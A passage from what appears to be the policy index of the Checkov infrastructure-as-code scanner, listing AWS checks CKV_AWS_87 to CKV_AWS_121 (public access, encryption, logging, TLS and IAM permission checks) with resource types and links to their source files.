[CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py) | -| 354 | CKV_AWS_87 | resource | AWS::Redshift::Cluster | Redshift cluster should not be publicly accessible | Cloudformation | [RedshiftClusterPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterPubliclyAccessible.py) | -| 355 | CKV_AWS_87 | resource | aws_redshift_cluster | Redshift cluster should not be publicly accessible | Terraform | [RedshitClusterPubliclyAvailable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py) | -| 356 | CKV_AWS_88 | resource | AWS::EC2::Instance | EC2 instance should not have public IP. | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) | -| 357 | CKV_AWS_88 | resource | AWS::EC2::LaunchTemplate | EC2 instance should not have public IP. | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) | -| 358 | CKV_AWS_88 | resource | [?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 359 | CKV_AWS_88 | resource | [?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 360 | CKV_AWS_88 | resource | [].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. 
| Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 361 | CKV_AWS_88 | resource | [].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 362 | CKV_AWS_88 | resource | [].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 363 | CKV_AWS_88 | resource | [].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 364 | CKV_AWS_88 | resource | [].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 365 | CKV_AWS_88 | resource | [].block[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 366 | CKV_AWS_88 | resource | [].tasks[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 367 | CKV_AWS_88 | resource | [].tasks[?"ec2_instance" != null][] | EC2 instance should not have public IP. 
| Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 368 | CKV_AWS_88 | resource | [].tasks[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 369 | CKV_AWS_88 | resource | [].tasks[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 370 | CKV_AWS_88 | resource | [].tasks[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 371 | CKV_AWS_88 | resource | [].tasks[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 372 | CKV_AWS_88 | resource | [].tasks[].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 373 | CKV_AWS_88 | resource | [].tasks[].block[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 374 | CKV_AWS_88 | resource | aws_instance | EC2 instance should not have public IP. 
| Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | -| 375 | CKV_AWS_88 | resource | aws_launch_template | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | -| 376 | CKV_AWS_89 | resource | AWS::DMS::ReplicationInstance | DMS replication instance should not be publicly accessible | Cloudformation | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | -| 377 | CKV_AWS_89 | resource | aws_dms_replication_instance | DMS replication instance should not be publicly accessible | Terraform | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | -| 378 | CKV_AWS_90 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure DocumentDB TLS is not disabled | Cloudformation | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBTLS.py) | -| 379 | CKV_AWS_90 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB TLS is not disabled | Terraform | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBTLS.py) | -| 380 | CKV_AWS_91 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure the ELBv2 (Application/Network) has access logging enabled | Cloudformation | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBv2AccessLogs.py) | -| 381 | CKV_AWS_91 | resource | aws_alb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | 
[ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | -| 382 | CKV_AWS_91 | resource | aws_lb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | -| 383 | CKV_AWS_92 | resource | AWS::ElasticLoadBalancing::LoadBalancer | Ensure the ELB has access logging enabled | Cloudformation | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py) | -| 384 | CKV_AWS_92 | resource | aws_elb | Ensure the ELB has access logging enabled | Terraform | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBAccessLogs.py) | -| 385 | CKV_AWS_93 | resource | aws_s3_bucket | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | -| 386 | CKV_AWS_93 | resource | aws_s3_bucket_policy | Ensure S3 bucket policy does not lockout all but root user. 
(Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | -| 387 | CKV_AWS_94 | resource | AWS::Glue::DataCatalogEncryptionSettings | Ensure Glue Data Catalog Encryption is enabled | Cloudformation | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py) | -| 388 | CKV_AWS_94 | resource | aws_glue_data_catalog_encryption_settings | Ensure Glue Data Catalog Encryption is enabled | Terraform | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueDataCatalogEncryption.py) | -| 389 | CKV_AWS_95 | resource | AWS::ApiGatewayV2::Stage | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | -| 390 | CKV_AWS_95 | resource | AWS::Serverless::HttpApi | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | -| 391 | CKV_AWS_96 | resource | AWS::RDS::DBCluster | Ensure all data stored in Aurora is securely encrypted at rest | Cloudformation | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AuroraEncryption.py) | -| 392 | CKV_AWS_96 | resource | aws_rds_cluster | Ensure all data stored in Aurora is securely encrypted at rest | Terraform | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AuroraEncryption.py) | -| 393 | CKV_AWS_97 | resource | AWS::ECS::TaskDefinition | Ensure Encryption in transit 
is enabled for EFS volumes in ECS Task definitions | Cloudformation | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | -| 394 | CKV_AWS_97 | resource | aws_ecs_task_definition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Terraform | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | -| 395 | CKV_AWS_98 | resource | aws_sagemaker_endpoint_configuration | Ensure all data stored in the Sagemaker Endpoint is securely encrypted at rest | Terraform | [SagemakerEndpointConfigurationEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py) | -| 396 | CKV_AWS_99 | resource | AWS::Glue::SecurityConfiguration | Ensure Glue Security Configuration Encryption is enabled | Cloudformation | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py) | -| 397 | CKV_AWS_99 | resource | aws_glue_security_configuration | Ensure Glue Security Configuration Encryption is enabled | Terraform | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfiguration.py) | -| 398 | CKV_AWS_100 | resource | AWS::EKS::Nodegroup | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Cloudformation | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | -| 399 | CKV_AWS_100 | resource | aws_eks_node_group | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Terraform | 
[EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | -| 400 | CKV_AWS_101 | resource | AWS::Neptune::DBCluster | Ensure Neptune logging is enabled | Cloudformation | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterLogging.py) | -| 401 | CKV_AWS_101 | resource | aws_neptune_cluster | Ensure Neptune logging is enabled | Terraform | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py) | -| 402 | CKV_AWS_102 | resource | aws_neptune_cluster_instance | Ensure Neptune Cluster instance is not publicly available | Terraform | [NeptuneClusterInstancePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py) | -| 403 | CKV_AWS_103 | resource | AWS::ElasticLoadBalancingV2::Listener | Ensure that Load Balancer Listener is using at least TLS v1.2 | Cloudformation | [ALBListenerTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py) | -| 404 | CKV_AWS_103 | resource | aws_alb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | -| 405 | CKV_AWS_103 | resource | aws_lb | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | -| 406 | CKV_AWS_103 | resource | aws_lb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | 
[AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | -| 407 | CKV_AWS_104 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure DocumentDB has audit logs enabled | Cloudformation | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py) | -| 408 | CKV_AWS_104 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB has audit logs enabled | Terraform | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py) | -| 409 | CKV_AWS_105 | resource | AWS::Redshift::ClusterParameterGroup | Ensure Redshift uses SSL | Cloudformation | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedShiftSSL.py) | -| 410 | CKV_AWS_105 | resource | aws_redshift_parameter_group | Ensure Redshift uses SSL | Terraform | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedShiftSSL.py) | -| 411 | CKV_AWS_106 | resource | aws_ebs_encryption_by_default | Ensure EBS default encryption is enabled | Terraform | [EBSDefaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py) | -| 412 | CKV_AWS_107 | resource | AWS::IAM::Group | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 413 | CKV_AWS_107 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 414 | CKV_AWS_107 | resource | 
AWS::IAM::Policy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 415 | CKV_AWS_107 | resource | AWS::IAM::Role | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 416 | CKV_AWS_107 | resource | AWS::IAM::User | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 417 | CKV_AWS_107 | data | aws_iam_policy_document | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py) | -| 418 | CKV_AWS_108 | resource | AWS::IAM::Group | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 419 | CKV_AWS_108 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 420 | CKV_AWS_108 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 421 | CKV_AWS_108 | resource | AWS::IAM::Role | Ensure IAM policies does not allow data exfiltration | Cloudformation | 
[IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 422 | CKV_AWS_108 | resource | AWS::IAM::User | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 423 | CKV_AWS_108 | data | aws_iam_policy_document | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMDataExfiltration.py) | -| 424 | CKV_AWS_109 | resource | AWS::IAM::Group | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 425 | CKV_AWS_109 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 426 | CKV_AWS_109 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 427 | CKV_AWS_109 | resource | AWS::IAM::Role | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 428 | CKV_AWS_109 | resource | AWS::IAM::User | Ensure IAM policies does not allow permissions management 
without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 429 | CKV_AWS_109 | data | aws_iam_policy_document | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py) | -| 430 | CKV_AWS_110 | resource | AWS::IAM::Group | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 431 | CKV_AWS_110 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 432 | CKV_AWS_110 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 433 | CKV_AWS_110 | resource | AWS::IAM::Role | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 434 | CKV_AWS_110 | resource | AWS::IAM::User | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 435 | CKV_AWS_110 | data | aws_iam_policy_document | Ensure IAM policies does not allow privilege 
escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPrivilegeEscalation.py) | -| 436 | CKV_AWS_111 | resource | AWS::IAM::Group | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | -| 437 | CKV_AWS_111 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | -| 438 | CKV_AWS_111 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | -| 439 | CKV_AWS_111 | resource | AWS::IAM::Role | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | -| 440 | CKV_AWS_111 | resource | AWS::IAM::User | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | -| 441 | CKV_AWS_111 | data | aws_iam_policy_document | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMWriteAccess.py) | -| 442 | CKV_AWS_112 | resource | aws_ssm_document | Ensure Session Manager data is encrypted in transit | Terraform | 
[SSMSessionManagerDocumentEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py) | -| 443 | CKV_AWS_113 | resource | aws_ssm_document | Ensure Session Manager logs are enabled and encrypted | Terraform | [SSMSessionManagerDocumentLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py) | -| 444 | CKV_AWS_114 | resource | aws_emr_cluster | Ensure that EMR clusters with Kerberos have Kerberos Realm set | Terraform | [EMRClusterKerberosAttributes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py) | -| 445 | CKV_AWS_115 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | -| 446 | CKV_AWS_115 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | -| 447 | CKV_AWS_115 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Terraform | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | -| 448 | CKV_AWS_116 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | 
[LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) | -| 449 | CKV_AWS_116 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) | -| 450 | CKV_AWS_116 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Terraform | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py) | -| 451 | CKV_AWS_117 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) | -| 452 | CKV_AWS_117 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) | -| 453 | CKV_AWS_117 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured inside a VPC | Terraform | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaInVPC.py) | -| 454 | CKV_AWS_118 | resource | AWS::RDS::DBInstance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Cloudformation | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | -| 455 | CKV_AWS_118 | resource | aws_db_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | 
[RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | -| 456 | CKV_AWS_118 | resource | aws_rds_cluster_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | -| 457 | CKV_AWS_119 | resource | AWS::DynamoDB::Table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Cloudformation | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamoDBTablesEncrypted.py) | -| 458 | CKV_AWS_119 | resource | aws_dynamodb_table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Terraform | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py) | -| 459 | CKV_AWS_120 | resource | AWS::ApiGateway::Stage | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) | -| 460 | CKV_AWS_120 | resource | AWS::Serverless::Api | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) | -| 461 | CKV_AWS_120 | resource | aws_api_gateway_stage | Ensure API Gateway caching is enabled | Terraform | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py) | -| 462 | CKV_AWS_121 | resource | aws_config_configuration_aggregator | Ensure AWS Config is enabled in all regions | Terraform | 
